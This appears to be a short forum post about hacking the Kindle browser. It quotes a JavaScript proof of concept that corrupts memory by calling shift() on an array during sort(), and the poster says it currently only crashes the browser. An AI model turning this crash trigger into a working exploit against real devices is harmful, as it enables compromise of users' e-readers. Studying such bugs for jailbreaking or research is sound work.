As of now, we "only" have an exploit which is causing the Kindle browser to crash:
Quote:
<script type="text/javascript">
var u32 = new Uint32Array(0x100);
var a1 = [0,1,2,3,u32];
var a2 = [0,1,2,3,4];
var a1len = a1.length;
var a2len = a2.length;
var u32len = u32.length;
var myCompFunc = function(x,y)
{
if (y == 3 && x == u32) {
// shift() is calling during sort(), what causes the
// last array item is written outside the array buffer
a1.shift();
}
return 0;
}
a1.sort(myCompFunc);
</script>
|